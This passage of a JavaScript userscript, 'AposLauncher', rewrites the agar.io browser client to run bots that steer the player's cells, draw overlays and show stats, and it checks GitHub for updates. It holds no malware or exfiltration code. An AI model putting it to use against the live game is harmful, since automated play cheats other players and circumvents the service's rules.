THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.*/
// ==UserScript==
// @name AposLauncher
// @namespace AposLauncher
// @include http://agar.io/*
// @version 3.068
// @grant none
// @author http://www.twitch.tv/apostolique
// ==/UserScript==
var aposLauncherVersion = 3.068;
Number.prototype.mod = function(n) {
return ((this % n) + n) % n;
};
Array.prototype.peek = function() {
return this[this.length - 1];
}
var sha = "efde0488cc2cc176db48dd23b28a20b90314352b";
function getLatestCommit() {
window.jQuery.ajax({
url: "https://api.github.com/repos/agariotool/agariobot/git/refs/heads/master",
cache: false,
dataType: "jsonp"
}).done(function(data) {
console.dir(data["data"])
console.log("hmm: " + data["data"]["object"]["sha"]);
sha = data["data"]["object"]["sha"];
function update(prefix, name, url) {
window.jQuery(document.body).prepend("<div id='" + prefix + "Dialog' style='position: absolute; left: 0px; right: 0px; top: 0px; bottom: 0px; z-index: 100; display: none;'>");
window.jQuery('#' + prefix + 'Dialog').append("<div id='" + prefix + "Message' style='width: 350px; background-color: #FFFFFF; margin: 100px auto; border-radius: 15px; padding: 5px 15px 5px 15px;'>");
window.jQuery('#' + prefix + 'Message').append("<h2>UPDATE TIME!!!</h2>");
window.jQuery('#' + prefix + 'Message').append("<p>Grab the update for: <a id='" + prefix + "Link' href='" + url + "' target=\"_blank\">" + name + "</a></p>");
window.jQuery('#' + prefix + 'Link').on('click', function() {
window.jQuery("#" + prefix + "Dialog").hide();
window.jQuery("#" + prefix + "Dialog").remove();
});
window.jQuery("#" + prefix + "Dialog").show();
}
window.jQuery.get('https://raw.githubusercontent.com/agariotool/agariobot/master/launcher.user.js?' + Math.floor((Math.random() * 1000000) + 1), function(data) {
var latestVersion = data.replace(/(\r\n|\n|\r)/gm, "");
latestVersion = latestVersion.substring(latestVersion.indexOf("// @version") + 11, latestVersion.indexOf("// @grant"));
latestVersion = parseFloat(latestVersion + 0.0000);
var myVersion = parseFloat(aposLauncherVersion + 0.0000);
if (latestVersion > myVersion) {
update("aposLauncher", "launcher.user.js", "hhttps://github.com/agariotool/agariobot/blob/" + sha + "/launcher.user.js/");
}
console.log('Current launcher.user.js Version: ' + myVersion + " on Github: " + latestVersion);
});
}).fail(function() {});
}
getLatestCommit();
console.log("Running Bot Launcher!");
(function(d, e) {
//UPDATE
function keyAction(e) {
if (84 == e.keyCode) {
console.log("Toggle");
toggle = !toggle;
}
if (82 == e.keyCode) {
console.log("ToggleDraw");
toggleDraw = !toggleDraw;
}
if (83 == e.keyCode) {
selectedCell = (selectedCell + 1).mod(getPlayer().length + 1);
console.log("Next Cell " + selectedCell);
}
if (68 == e.keyCode) {
window.setDarkTheme(!getDarkBool());
}
if (70 == e.keyCode) {
window.setShowMass(!getMassBool());
}
if (69 == e.keyCode) {
if (message.length > 0) {
window.setMessage([]);
window.onmouseup = function() {};
window.ignoreStream = true;
} else {
window.ignoreStream = false;
window.refreshTwitch();
}
}
if (81 == e.keyCode) {
console.log("ToggleFollowMouse");
toggleFollow = !toggleFollow;
}
}
function humanPlayer() {
//Don't need to do anything.
var player = getPlayer();
var destination = [];
for (var i = 0; i < player.length; i++) {
destination.push([getPointX(), getPointY()])
}
return destination;
}
function pb() {
//UPDATE
if (window.botList == null) {
window.botList = [];
window.jQuery('#locationUnknown').append(window.jQuery('<select id="bList" class="form-control" onchange="setBotIndex($(this).val());" />'));
window.jQuery('#locationUnknown').addClass('form-group');
}
window.jQuery('#nick').val(originalName);
if (window.botList.length == 0) {
window.botList.push(["Human", humanPlayer]);
var bList = window.jQuery('#bList');
window.jQuery('<option />', {
value: (window.botList.length - 1),
text: "Human"
}).appendTo(bList);
}
ya = !0;
Pa();
setInterval(Pa, 18E4);
var father = window.jQuery("#canvas").parent();
window.jQuery("#canvas").remove();
father.prepend("<canvas id='canvas'>");
G = za = document.getElementById("canvas");
f = G.getContext("2d");
G.onmousedown = function(a) {
if (Qa) {
var b = a.clientX - (5 + m / 5 / 2),
c = a.clientY - (5 + m / 5 / 2);
if (Math.sqrt(b * b + c * c) <= m / 5 / 2) {
V();
H(17);
return
}
}
fa = a.clientX;
ga = a.clientY;
Aa();
V();
};
G.onmousemove = function(a) {
fa = a.clientX;
ga = a.clientY;
Aa();
};
G.onmouseup = function() {};
/firefox/i.test(navigator.userAgent) ? document.addEventListener("DOMMouseScroll", Ra, !1) : document.body.onmousewheel = Ra;
var a = !1,
b = !1,
c = !1;
d.onkeydown = function(l) {
//UPDATE
if (!window.jQuery('#nick').is(":focus")) {
32 != l.keyCode || a || (V(), H(17), a = !0);
81 != l.keyCode || b || (H(18), b = !0);
87 != l.keyCode || c || (V(), H(21), c = !0);
27 == l.keyCode && Sa(!0);
//UPDATE
keyAction(l);
}
};
d.onkeyup = function(l) {
32 == l.keyCode && (a = !1);
87 == l.keyCode && (c = !1);
81 == l.keyCode && b && (H(19), b = !1);
};
d.onblur = function() {
H(19);
c = b = a = !1
};
d.onresize = Ta;
d.requestAnimationFrame(Ua);
setInterval(V, 40);
y && e("#region").val(y);
Va();
ha(e("#region").val());
0 == Ba && y && I();
W = !0;
e("#overlays").show();
Ta();
d.location.hash && 6 <= d.location.hash.length && Wa(d.location.hash)
}
function Ra(a) {
J *= Math.pow(.9, a.wheelDelta / -120 || a.detail || 0);
//UPDATE
0.07 > J && (J = 0.07);
J > 4 / h && (J = 4 / h)
}
function qb() {
if (.4 > h) X = null;
else {
for (var a = Number.POSITIVE_INFINITY, b = Number.POSITIVE_INFINITY, c = Number.NEGATIVE_INFINITY, l = Number.NEGATIVE_INFINITY, d = 0, p = 0; p < v.length; p++) {
var g = v[p];
!g.N() || g.R || 20 >= g.size * h || (d = Math.max(g.size, d), a = Math.min(g.x, a), b = Math.min(g.y, b), c = Math.max(g.x, c), l = Math.max(g.y, l))
}
X = rb.ka({
ca: a - 10,
da: b - 10,
oa: c + 10,
pa: l + 10,
ma: 2,
na: 4
});
for (p = 0; p < v.length; p++)
if (g = v[p],
g.N() && !(20 >= g.size * h))
for (a = 0; a < g.a.length; ++a) b = g.a[a].x, c = g.a[a].y, b < s - m / 2 / h || c < t - r / 2 / h || b > s + m / 2 / h || c > t + r / 2 / h || X.m(g.a[a])
}
}
function Aa() {
//UPDATE
if (selectedCell > 0 && selectedCell <= getPlayer().length) {
setPoint(((fa - m / 2) / h + s), ((ga - r / 2) / h + t), selectedCell - 1);
drawCircle(getPlayer()[selectedCell - 1].x, getPlayer()[selectedCell - 1].y, getPlayer()[selectedCell - 1].size, 8);
drawCircle(getPlayer()[selectedCell - 1].x, getPlayer()[selectedCell - 1].y, getPlayer()[selectedCell - 1].size / 2, 8);
} else if (selectedCell > getPlayer().length) {
selectedCell = 0;
}
if (toggle || window.botList[botIndex][0] == "Human") {
var startIndex = (selectedCell == 0 ? 0 : selectedCell - 1);
for (var i = 0; i < getPlayer().length - (selectedCell == 0 ? 0 : 1); i++) {
setPoint(((fa - m / 2) / h + s) + i, ((ga - r / 2) / h + t) + i, (i + startIndex).mod(getPlayer().length));
}
}
}
function Pa() {
null == ka && (ka = {}, e("#region").children().each(function() {
var a = e(this),
b = a.val();
b && (ka[b] = a.text())
}));
e.get("https://m.agar.io/info", function(a) {
var b = {},
c;
for (c in a.regions) {
var l = c.split(":")[0];
b[l] = b[l] || 0;
b[l] += a.regions[c].numPlayers
}
for (c in b) e('#region option[value="' + c + '"]').text(ka[c] + " (" + b[c] + " players)")
},
"json")
}
function Xa() {
e("#adsBottom").hide();
e("#overlays").hide();
W = !1;
Va();
d.googletag && d.googletag.pubads && d.googletag.pubads().clear(d.aa)
}
function ha(a) {
a && a != y && (e("#region").val() != a && e("#region").val(a), y = d.localStorage.location = a, e(".region-message").hide(), e(".region-message." + a).show(), e(".btn-needs-server").prop("disabled", !1), ya && I())
}
function Sa(a) {
W || (K = null, sb(), a && (x = 1), W = !0, e("#overlays").fadeIn(a ? 200 : 3E3))
}
function Y(a) {
e("#helloContainer").attr("data-gamemode", a);
P = a;
e("#gamemode").val(a)
}
function Va() {
e("#region").val() ? d.localStorage.location = e("#region").val() : d.localStorage.location && e("#region").val(d.localStorage.location);
e("#region").val() ? e("#locationKnown").append(e("#region")) : e("#locationUnknown").append(e("#region"))
}
function sb() {
la && (la = !1, setTimeout(function() {
la = !0
//UPDATE
}, 6E4 * Ya))
}
function Z(a) {
return d.i18n[a] || d.i18n_dict.en[a] || a
}
function Za() {
var a = ++Ba;
console.log("Find " + y + P);
e.ajax("https://m.agar.io/findServer", {
error: function() {
setTimeout(Za, 1E3)
},
success: function(b) {
a == Ba && (b.alert && alert(b.alert), Ca("ws://" + b.ip, b.token))
},
dataType: "json",
method: "POST",
cache: !1,
crossDomain: !0,
data: (y + P || "?") + "\n154669603"
})
}
function I() {
ya && y && (e("#connecting").show(), Za())
}
function Ca(a, b) {
if (q) {
q.onopen = null;
q.onmessage = null;
q.onclose = null;
try {
q.close()
} catch (c) {}
q = null
}
Da.la && (a = "ws://" + Da.la);
if (null != L) {
var l = L;
L = function() {
l(b)
}
}
if (tb) {
var d = a.split(":");
a = d[0] + "s://ip-" + d[1].replace(/\./g, "-").replace(/\//g, "") + ".tech.agar.io:" + (+d[2] + 2E3)
}
M = [];
k = [];
E = {};
v = [];
Q = [];
F = [];
z = A = null;
R = 0;
$ = !1;
console.log("Connecting to " + a);
//UPDATE
serverIP = a;
q = new WebSocket(a);
q.binaryType = "arraybuffer";
q.onopen = function() {
var a;
console.log("socket open");
a = N(5);
a.setUint8(0, 254);
a.setUint32(1, 5, !0);
O(a);
a = N(5);
a.setUint8(0, 255);
a.setUint32(1, 154669603, !0);
O(a);
a = N(1 + b.length);
a.setUint8(0, 80);
for (var c = 0; c < b.length; ++c) a.setUint8(c + 1, b.charCodeAt(c));
O(a);
$a()
};
q.onmessage = ub;
q.onclose = vb;
q.onerror = function() {
console.log("socket error")
}
}
function N(a) {
return new DataView(new ArrayBuffer(a))
}
function O(a) {
q.send(a.buffer)
}
function vb() {
$ && (ma = 500);
console.log("socket close");
setTimeout(I, ma);
ma *= 2
}
function ub(a) {
wb(new DataView(a.data))
}
function wb(a) {
function b() {
for (var b = "";;) {
var d = a.getUint16(c, !0);
c += 2;
if (0 == d) break;
b += String.fromCharCode(d)
}
return b
}
var c = 0;
240 == a.getUint8(c) && (c += 5);
switch (a.getUint8(c++)) {
case 16:
xb(a, c);
break;
case 17:
aa = a.getFloat32(c, !0);
c += 4;
ba = a.getFloat32(c, !0);
c += 4;
ca = a.getFloat32(c, !0);
c += 4;
break;
case 20:
k = [];
M = [];
break;
case 21:
Ea = a.getInt16(c, !0);
c += 2;
Fa = a.getInt16(c, !0);
c += 2;
Ga || (Ga = !0, na = Ea, oa = Fa);
break;
case 32:
M.push(a.getUint32(c, !0));
c += 4;
break;
case 49:
if (null != A) break;
var l = a.getUint32(c, !0),
c = c + 4;
F = [];
for (var d = 0; d < l; ++d) {
var p = a.getUint32(c, !0),
c = c + 4;
F.push({
id: p,
name: b()
})
}
ab();
break;
case 50:
A = [];
l = a.getUint32(c, !0);
c += 4;
for (d = 0; d < l; ++d) A.push(a.getFloat32(c, !0)), c += 4;
ab();
break;
case 64:
pa = a.getFloat64(c, !0);
c += 8;
qa = a.getFloat64(c, !0);
c += 8;
ra = a.getFloat64(c, !0);
c += 8;
sa = a.getFloat64(c, !0);
c += 8;
aa = (ra + pa) / 2;
ba = (sa + qa) / 2;
ca = 1;
0 == k.length && (s = aa, t = ba, h = ca);
break;
case 81:
var g = a.getUint32(c, !0),
c = c + 4,
e = a.getUint32(c, !0),
c = c + 4,
f = a.getUint32(c, !0),
c = c + 4;
setTimeout(function() {
S({
e: g,
f: e,
d: f
})
}, 1200)
}
}
function xb(a, b) {
bb = C = Date.now();
$ || ($ = !0, e("#connecting").hide(), cb(), L && (L(), L = null));
var c = Math.random();
Ha = !1;
var d = a.getUint16(b, !0);
b += 2;
for (var u = 0; u < d; ++u) {
var p = E[a.getUint32(b, !0)],
g = E[a.getUint32(b + 4, !0)];
b += 8;
p && g && (g.X(), g.s = g.x, g.t = g.y, g.r = g.size, g.J = p.x, g.K = p.y, g.q = g.size, g.Q =
C)
}
for (u = 0;;) {
d = a.getUint32(b, !0);
b += 4;
if (0 == d) break;
++u;
var f, p = a.getInt16(b, !0);
b += 4;
g = a.getInt16(b, !0);
b += 4;
f = a.getInt16(b, !0);
b += 2;
for (var h = a.getUint8(b++), w = a.getUint8(b++), m = a.getUint8(b++), h = (h << 16 | w << 8 | m).toString(16); 6 > h.length;) h = "0" + h;
var h = "#" + h,
w = a.getUint8(b++),
m = !!(w & 1),
r = !!(w & 16);
w & 2 && (b += 4);
w & 4 && (b += 8);
w & 8 && (b += 16);
for (var q, n = "";;) {
q = a.getUint16(b, !0);
b += 2;
if (0 == q) break;
n += String.fromCharCode(q)
}
q = n;
n = null;
E.hasOwnProperty(d) ? (n = E[d], n.P(), n.s = n.x, n.t = n.y, n.r = n.size, n.color = h) :
(n = new da(d, p, g, f, h, q), v.push(n), E[d] = n, n.ua = p, n.va = g);
n.h = m;
n.n = r;
n.J = p;
n.K = g;
n.q = f;
n.sa = c;
n.Q = C;
n.ba = w;
q && n.B(q); - 1 != M.indexOf(d) && -1 == k.indexOf(n) && (document.getElementById("overlays").style.display = "none", k.push(n), 1 == k.length && (s = n.x, t = n.y, db()))
//UPDATE
interNodes[d] = window.getCells()[d];
}
//UPDATE
Object.keys(interNodes).forEach(function(element, index) {
//console.log("start: " + interNodes[element].updateTime + " current: " + D + " life: " + (D - interNodes[element].updateTime));
var isRemoved = !window.getCells().hasOwnProperty(element);
if (isRemoved && (window.getLastUpdate() - interNodes[element].getUptimeTime()) > 3000) {
delete interNodes[element];
} else {
for (var i = 0; i < getPlayer().length; i++) {
if (isRemoved && computeDistance(getPlayer()[i].x, getPlayer()[i].y, interNodes[element].x, interNodes[element].y) < getPlayer()[i].size + 710) {
delete interNodes[element];
break;
}
}
}
});
c = a.getUint32(b, !0);
b += 4;
for (u = 0; u < c; u++) d = a.getUint32(b, !0), b += 4, n = E[d], null != n && n.X();
//UPDATE
//Ha && 0 == k.length && Sa(!1)
}
//UPDATE
function computeDistance(x1, y1, x2, y2) {
var xdis = x1 - x2; // <--- FAKE AmS OF COURSE!
var ydis = y1 - y2;
var distance = Math.sqrt(xdis * xdis + ydis * ydis);
return distance;
}
function screenDistance() {
return Math.min(computeDistance(getOffsetX(), getOffsetY(), screenToGameX(getWidth()), getOffsetY()), computeDistance(getOffsetX(), getOffsetY(), getOffsetX(), screenToGameY(getHeight())));
}
window.verticalDistance = function() {
return computeDistance(screenToGameX(0), screenToGameY(0), screenToGameX(getWidth()), screenToGameY(getHeight()));
}
function screenToGameX(x) {
return (x - getWidth() / 2) / getRatio() + getX();
}
function screenToGameY(y) {
return (y - getHeight() / 2) / getRatio() + getY();
}
window.drawPoint = function(x_1, y_1, drawColor, text) {
if (!toggleDraw) {
dPoints.push([x_1, y_1, drawColor]);
dText.push(text);
}
}
window.drawArc = function(x_1, y_1, x_2, y_2, x_3, y_3, drawColor) {
if (!toggleDraw) {
var radius = computeDistance(x_1, y_1, x_3, y_3);
dArc.push([x_1, y_1, x_2, y_2, x_3, y_3, radius, drawColor]);
}
}
window.drawLine = function(x_1, y_1, x_2, y_2, drawColor) {
if (!toggleDraw) {
lines.push([x_1, y_1, x_2, y_2, drawColor]);
}
}
window.drawCircle = function(x_1, y_1, radius, drawColor) {
if (!toggleDraw) {
circles.push([x_1, y_1, radius, drawColor]);
}
}
function V() {
//UPDATE
if (getPlayer().length == 0 && !reviving && ~~(getCurrentScore() / 100) > 0) {
console.log("Dead: " + ~~(getCurrentScore() / 100));
apos('send', 'pageview');
}
if (getPlayer().length == 0) {
console.log("Revive");
setNick(originalName);
reviving = true;
} else if (getPlayer().length > 0 && reviving) {
reviving = false;
console.log("Done Reviving!");
}
if (T()) {
var a = fa - m / 2;
var b = ga - r / 2;
for (var i = 0; i < getPlayer().length; i++) {
var tempID = getPlayer()[i].id;
64 > a * a + b * b || .01 > Math.abs(eb - ia[i]) &&
.01 > Math.abs(fb - ja[i]) || (eb = ia[i], fb = ja[i], a = N(13), a.setUint8(0, 16), a.setInt32(1, ia[i], !0), a.setInt32(5, ja[i], !0), a.setUint32(9, tempID, !0), O(a))
}
}
}
function cb() {
if (T() && $ && null != K) {
var a = N(1 + 2 * K.length);
a.setUint8(0, 0);
for (var b = 0; b < K.length; ++b) a.setUint16(1 + 2 * b, K.charCodeAt(b), !0);
O(a)
}
}
function T() {
return null != q && q.readyState == q.OPEN
}
window.opCode = function(a) {
console.log("Sending op code.");
H(parseInt(a));
}
function H(a) {
if (T()) {
var b = N(1);
b.setUint8(0, a);
O(b)
}
}
function $a() {
if (T() && null != B) {
var a = N(1 + B.length);
a.setUint8(0, 81);
for (var b = 0; b < B.length; ++b) a.setUint8(b + 1, B.charCodeAt(b));
O(a)
}
}
function Ta() {
m = d.innerWidth;
r = d.innerHeight;
za.width = G.width = m;
za.height = G.height = r;
var a = e("#helloContainer");
a.css("transform", "none");
var b = a.height(),
c = d.innerHeight;
b > c / 1.1 ? a.css("transform", "translate(-50%, -50%) scale(" + c / b / 1.1 + ")") : a.css("transform", "translate(-50%, -50%)");
gb()
}
function hb() {
var a;
a = Math.max(r / 1080, m / 1920);
return a *= J
}
function yb() {
if (0 != k.length) {
for (var a = 0, b = 0; b < k.length; b++) a += k[b].size;
a = Math.pow(Math.min(64 / a, 1), .4) * hb();
h = (9 * h + a) / 10
}
}
function gb() {
//UPDATE
dPoints = [];
circles = [];
dArc = [];
dText = [];
lines = [];
var a, b = Date.now();
++zb;
C = b;
if (0 < k.length) {
yb();
for (var c = a = 0, d = 0; d < k.length; d++) k[d].P(), a += k[d].x / k.length, c += k[d].y / k.length;
aa = a;
ba = c;
ca = h;
s = (s + a) / 2;
t = (t + c) / 2;
} else s = (29 * s + aa) / 30, t = (29 * t + ba) / 30, h = (9 * h + ca * hb()) / 10;
qb();
Aa();
Ia || f.clearRect(0, 0, m, r);
Ia ? (f.fillStyle = ta ? "#111111" : "#F2FBFF", f.globalAlpha = .05, f.fillRect(0, 0, m, r), f.globalAlpha = 1) : Ab();
v.sort(function(a, b) {
return a.size == b.size ? a.id - b.id : a.size - b.size
});
f.save();
f.translate(m / 2, r / 2);
f.scale(h, h);
f.translate(-s, -t);
//UPDATE
f.save();
f.beginPath();
f.lineWidth = 5;
f.strokeStyle = "#FFFFFF";
f.moveTo(getMapStartX(), getMapStartY());
f.lineTo(getMapStartX(), getMapEndY());
f.stroke();
f.moveTo(getMapStartX(), getMapStartY());
f.lineTo(getMapEndX(), getMapStartY());
f.stroke();
f.moveTo(getMapEndX(), getMapStartY());
f.lineTo(getMapEndX(), getMapEndY());
f.stroke();
f.moveTo(getMapStartX(), getMapEndY());
f.lineTo(getMapEndX(), getMapEndY());
f.stroke();
f.restore();
for (d = 0; d < v.length; d++) v[d].w(f);
for (d = 0; d < Q.length; d++) Q[d].w(f);
//UPDATE
if (getPlayer().length > 0) {
var moveLoc = window.botList[botIndex][1](toggleFollow);
if (selectedCell > 0) {
Aa();
}
if (!toggle) {
var startIndex = (selectedCell == 0 ? 0 : selectedCell);
for (var i = 0; i < getPlayer().length - (selectedCell == 0 ? 0 : 1); i++) {
setPoint(moveLoc[(i + startIndex).mod(getPlayer().length)][0], moveLoc[(i + startIndex).mod(getPlayer().length)][1], (i + startIndex).mod(getPlayer().length));
}
}
}
customRender(f);
if (Ga) {
na = (3 * na + Ea) / 4;
oa = (3 * oa + Fa) / 4;
f.save();
f.strokeStyle = "#FFAAAA";
f.lineWidth = 10;
f.lineCap = "round";
f.lineJoin = "round";
f.globalAlpha = .5;
f.beginPath();
for (d = 0; d < k.length; d++) f.moveTo(k[d].x, k[d].y), f.lineTo(na, oa);
f.stroke();
f.restore();
}
f.restore();
z && z.width && f.drawImage(z, m - z.width - 10, 10);
R = Math.max(R, Bb());
//UPDATE
var currentDate = new Date();
var nbSeconds = 0;
if (getPlayer().length > 0) {
//nbSeconds = currentDate.getSeconds() + currentDate.getMinutes() * 60 + currentDate.getHours() * 3600 - lifeTimer.getSeconds() - lifeTimer.getMinutes() * 60 - lifeTimer.getHours() * 3600;
nbSeconds = (currentDate.getTime() - lifeTimer.getTime())/1000;
}
bestTime = Math.max(nbSeconds, bestTime);
var displayText = 'Score: ' + ~~(R / 100) + " Current Time: " + nbSeconds + " seconds.";
0 != R && (null == ua && (ua = new va(24, "#FFFFFF")), ua.C(displayText), c = ua.L(), a = c.width, f.globalAlpha = .2, f.fillStyle = "#000000", f.fillRect(10, r - 10 - 24 - 10, a + 10, 34), f.globalAlpha = 1, f.drawImage(c, 15, r -
10 - 24 - 5));
Cb();
b = Date.now() - b;
b > 1E3 / 60 ? D -= .01 : b < 1E3 / 65 && (D += .01);.4 > D && (D = .4);
1 < D && (D = 1);
b = C - ib;
!T() || W ? (x += b / 2E3, 1 < x && (x = 1)) : (x -= b / 300, 0 > x && (x = 0));
0 < x && (f.fillStyle = "#000000", f.globalAlpha = .5 * x, f.fillRect(0, 0, m, r), f.globalAlpha = 1);
ib = C
drawStats(f);
}
//UPDATE
function customRender(d) {
d.save();
for (var i = 0; i < lines.length; i++) {
d.beginPath();
d.lineWidth = 5;
if (lines[i][4] == 0) {
d.strokeStyle = "#FF0000";
} else if (lines[i][4] == 1) {
d.strokeStyle = "#00FF00";
} else if (lines[i][4] == 2) {
d.strokeStyle = "#0000FF";
} else if (lines[i][4] == 3) {
d.strokeStyle = "#FF8000";
} else if (lines[i][4] == 4) {
d.strokeStyle = "#8A2BE2";
} else if (lines[i][4] == 5) {
d.strokeStyle = "#FF69B4";
} else if (lines[i][4] == 6) {
d.strokeStyle = "#008080";
} else if (lines[i][4] == 7) {
d.strokeStyle = "#FFFFFF";
} else {
d.strokeStyle = "#000000";
}
d.moveTo(lines[i][0], lines[i][1]);
d.lineTo(lines[i][2], lines[i][3]);
d.stroke();
}
d.restore();
d.save();
for (var i = 0; i < circles.length; i++) {
if (circles[i][3] == 0) {
d.strokeStyle = "#FF0000";
} else if (circles[i][3] == 1) {
d.strokeStyle = "#00FF00";
} else if (circles[i][3] == 2) {
d.strokeStyle = "#0000FF";
} else if (circles[i][3] == 3) {
d.strokeStyle = "#FF8000";
} else if (circles[i][3] == 4) {
d.strokeStyle = "#8A2BE2";
} else if (circles[i][3] == 5) {
d.strokeStyle = "#FF69B4";
} else if (circles[i][3] == 6) {
d.strokeStyle = "#008080";
} else if (circles[i][3] == 7) {
d.strokeStyle = "#FFFFFF";
} else {
d.strokeStyle = "#000000";
}
d.beginPath();
d.lineWidth = 10;
//d.setLineDash([5]);
d.globalAlpha = 0.3;
d.arc(circles[i][0], circles[i][1], circles[i][2], 0, 2 * Math.PI, false);
d.stroke();
}
d.restore();
d.save();
for (var i = 0; i < dArc.length; i++) {
if (dArc[i][7] == 0) {
d.strokeStyle = "#FF0000";
} else if (dArc[i][7] == 1) {
d.strokeStyle = "#00FF00";
} else if (dArc[i][7] == 2) {
d.strokeStyle = "#0000FF";
} else if (dArc[i][7] == 3) {
d.strokeStyle = "#FF8000";
} else if (dArc[i][7] == 4) {
d.strokeStyle = "#8A2BE2";
} else if (dArc[i][7] == 5) {
d.strokeStyle = "#FF69B4";
} else if (dArc[i][7] == 6) {
d.strokeStyle = "#008080";
} else if (dArc[i][7] == 7) {
d.strokeStyle = "#FFFFFF";
} else {
d.strokeStyle = "#000000";
}
d.beginPath();
d.lineWidth = 5;
var ang1 = Math.atan2(dArc[i][1] - dArc[i][5], dArc[i][0] - dArc[i][4]);
var ang2 = Math.atan2(dArc[i][3] - dArc[i][5], dArc[i][2] - dArc[i][4]);
d.arc(dArc[i][4], dArc[i][5], dArc[i][6], ang1, ang2, false);
d.stroke();
}
d.restore();
d.save();
for (var i = 0; i < dPoints.length; i++) {
if (dText[i] == "") {
var radius = 10;
d.beginPath();
d.arc(dPoints[i][0], dPoints[i][1], radius, 0, 2 * Math.PI, false);
if (dPoints[i][2] == 0) {
d.fillStyle = "black";
} else if (dPoints[i][2] == 1) {
d.fillStyle = "yellow";
} else if (dPoints[i][2] == 2) {
d.fillStyle = "blue";
} else if (dPoints[i][2] == 3) {
d.fillStyle = "red";
} else if (dPoints[i][2] == 4) {
d.fillStyle = "#008080";
} else if (dPoints[i][2] == 5) {
d.fillStyle = "#FF69B4";
} else {
d.fillStyle = "#000000";
}
d.fill();
d.lineWidth = 2;
d.strokeStyle = '#003300';
d.stroke();
} else {
var text = new va(18, (getDarkBool() ? '#F2FBFF' : '#111111'), true, '#000000');
text.C(dText[i]);
var textRender = text.L();
d.drawImage(textRender, dPoints[i][0], dPoints[i][1]);
}
}
d.restore();
}
function drawStats(d) {
d.save()
sessionScore = Math.max(getCurrentScore(), sessionScore);
var debugStrings = [];
debugStrings.push("Current Bot: " + window.botList[botIndex][0]);
debugStrings.push("T - Bot: " + (!toggle ? "On" : "Off"));
debugStrings.push("R - Lines: " + (!toggleDraw ? "On" : "Off"));
debugStrings.push("Q - Follow Mouse: " + (toggleFollow ? "On" : "Off"));
debugStrings.push("S - Manual Cell: " + (selectedCell == 0 ? "None" : selectedCell) + " of " + getPlayer().length);
debugStrings.push("");
debugStrings.push("Best Score: " + ~~(sessionScore / 100));
debugStrings.push("Best Time: " + bestTime + " seconds");
debugStrings.push("");
debugStrings.push(serverIP);
if (getPlayer().length > 0) {
var offsetX = -getMapStartX();
var offsetY = -getMapStartY();
debugStrings.push("Location: " + Math.floor(getPlayer()[0].x + offsetX) + ", " + Math.floor(getPlayer()[0].y + offsetY));
}
var offsetValue = 20;
var text = new va(18, (getDarkBool() ? '#F2FBFF' : '#111111'));
for (var i = 0; i < debugStrings.length; i++) {
text.C(debugStrings[i]);
var textRender = text.L();
d.drawImage(textRender, 20, offsetValue);
offsetValue += textRender.height;
}
if (message.length > 0) {
var mRender = [];
var mWidth = 0;
var mHeight = 0;
for (var i = 0; i < message.length; i++) {
var mText = new va(28, '#FF0000', true, '#000000');
mText.C(message[i]);
mRender.push(mText.L());
if (mRender[i].width > mWidth) {
mWidth = mRender[i].width;
}
mHeight += mRender[i].height;
}
var mX = getWidth() / 2 - mWidth / 2;
var mY = 20;
d.globalAlpha = 0.4;
d.fillStyle = '#000000';
d.fillRect(mX - 10, mY - 10, mWidth + 20, mHeight + 20);
d.globalAlpha = 1;
var mOffset = mY;
for (var i = 0; i < mRender.length; i++) {
d.drawImage(mRender[i], getWidth() / 2 - mRender[i].width / 2, mOffset);
mOffset += mRender[i].height;
}
}
d.restore();
}
function Ab() {
f.fillStyle = ta ? "#111111" : "#F2FBFF";
f.fillRect(0, 0, m, r);
f.save();
f.strokeStyle = ta ? "#AAAAAA" : "#000000";
f.globalAlpha = .2 * h;
for (var a = m / h, b = r / h, c = (a / 2 - s) % 50; c < a; c += 50) f.beginPath(), f.moveTo(c * h - .5, 0), f.lineTo(c * h - .5, b * h), f.stroke();
for (c = (b / 2 - t) % 50; c < b; c += 50) f.beginPath(), f.moveTo(0, c * h - .5), f.lineTo(a * h, c * h - .5), f.stroke();
f.restore()
}
function Cb() {
if (Qa && Ja.width) {
var a = m / 5;
f.drawImage(Ja, 5, 5, a, a)
}
}
function Bb() {
for (var a = 0, b = 0; b < k.length; b++) a += k[b].q * k[b].q;
return a
}
function ab() {
z = null;
if (null != A || 0 != F.length)
if (null != A || wa) {
z = document.createElement("canvas");
var a = z.getContext("2d"),
b = 60,
b = null == A ? b + 24 * F.length : b + 180,
c = Math.min(200, .3 * m) / 200;
z.width = 200 * c;
z.height = b * c;
a.scale(c, c);
a.globalAlpha = .4;
a.fillStyle = "#000000";
a.fillRect(0, 0, 200, b);
a.globalAlpha =
1;
a.fillStyle = "#FFFFFF";
c = null;
c = Z("leaderboard");
a.font = "30px Ubuntu";
a.fillText(c, 100 - a.measureText(c).width / 2, 40);
if (null == A)
for (a.font = "20px Ubuntu", b = 0; b < F.length; ++b) c = F[b].name || Z("unnamed_cell"), wa || (c = Z("unnamed_cell")), -1 != M.indexOf(F[b].id) ? (k[0].name && (c = k[0].name), a.fillStyle = "#FFAAAA") : a.fillStyle = "#FFFFFF", c = b + 1 + ". " + c, a.fillText(c, 100 - a.measureText(c).width / 2, 70 + 24 * b);
else
for (b = c = 0; b < A.length; ++b) {
var d = c + A[b] * Math.PI * 2;
a.fillStyle = Db[b + 1];
a.beginPath();
a.moveTo(100, 140);
a.arc(100,
140, 80, c, d, !1);
a.fill();
c = d
}
}
}
function Ka(a, b, c, d, e) {
this.V = a;
this.x = b;
this.y = c;
this.i = d;
this.b = e
}
function da(a, b, c, d, e, p) {
this.id = a;
this.s = this.x = b;
this.t = this.y = c;
this.r = this.size = d;
this.color = e;
this.a = [];
this.W();
this.B(p)
}
function va(a, b, c, d) {
a && (this.u = a);
b && (this.S = b);
this.U = !!c;
d && (this.v = d)
}
function S(a, b) {
var c = "1" == e("#helloContainer").attr("data-has-account-data");
e("#helloContainer").attr("data-has-account-data", "1");
if (null == b && d.localStorage.loginCache) {
var l = JSON.parse(d.localStorage.loginCache);
l.f = a.f;
l.d = a.d;
l.e = a.e;
d.localStorage.loginCache = JSON.stringify(l)
}
if (c) {
